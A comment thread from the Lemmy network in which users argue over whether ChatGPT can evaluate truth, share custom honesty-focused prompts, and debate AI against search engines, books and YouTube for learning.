I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.
Comment on People Are Losing Loved Ones to AI-Fueled Spiritual Fantasies
Zozano@aussie.zone 5 days ago
This is the reason I’ve deliberately customized GPT with the follow prompts:
-
User expects correction if words or phrases are used incorrectly. Tell it straight—no sugar-coating. Stay skeptical and question things. Keep a forward-thinking mindset.
-
User values deep, rational argumentation. Ensure reasoning is solid and well-supported.
-
User expects brutal honesty. Challenge weak or harmful ideas directly, no holds barred.
-
User prefers directness. Point out flaws and errors immediately, without hesitation.
-
User appreciates when assumptions are challenged. If something lacks support, dig deeper and challenge it.
dzso@lemmy.world 5 days ago
Zozano@aussie.zone 4 days ago
What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. ChatGPT is more consistent, less biased, and applies reasoning patterns that outperform the average human by miles.
Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.
So yes, it can evaluate truth. Not perfectly, but often better than the average person.
dzso@lemmy.world 4 days ago
I’m not saying humans are infallible at recognizing truth either. That’s why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.
Zozano@aussie.zone 4 days ago
Right now, the capabilities of LLM’s are the worst they’ll ever be. It could literally be tomorrow that someone drops and LLM that would be perfectly calibrated to evaluate truth claims. But right now, we’re at least 90% of the way there.
The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.
You don’t blame the tool, you blame the user. LLM’s are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent, well read and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.
I’m curious as to what you regard as a better tool for evaluating truth?
Period.
Olap@lemmy.world 5 days ago
I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There’s these things called newspapers that exist, they aren’t like they used to be but there is a choice of which to buy even.
I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.
A_norny_mousse@feddit.org 5 days ago
💯
I have yet to see people using AI for anything actually & everyday useful. You can search anything, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.
LainTrain@lemmy.dbzer0.com 5 days ago
Okay, challenge accepted.
I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits end. There’s a good chance it will also spit out complete nonsense like calling functions with parameters that don’t exist etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time due that I would’ve never guessed myself due to assumptions made in the docs of a library or some such.
It’s also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB’s examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).
Deceptichum@quokk.au 5 days ago
Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.
Search engines aren’t great with vague questions.
There’s this thing called using a wide variety of tools to one’s benefit.
Olap@lemmy.world 5 days ago
You search for topics and keywords on search engines. It’s a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!
And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toy’s can spark your curiosity, but you don’t rely on them. Toy’s look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum
Deceptichum@quokk.au 5 days ago
Buddy that’s great if you know the topic or keyword to search for, if you don’t and only have a vague query that you’re trying to find more about to learn some keywords or topics to search for, you can use AI.
You can grandstand about tools and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.
Zozano@aussie.zone 5 days ago
I often use it to check whether my rationale is correct, or if my opinions are valid.
Olap@lemmy.world 5 days ago
You do know it can’t reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!
Zozano@aussie.zone 5 days ago
Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.
LainTrain@lemmy.dbzer0.com 5 days ago
YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real you’re not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I’d rather they teach me how I can never have to eat again because boy that shit takes up so much time.
Olap@lemmy.world 5 days ago
For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.
Don’t use AI. Do your own thinking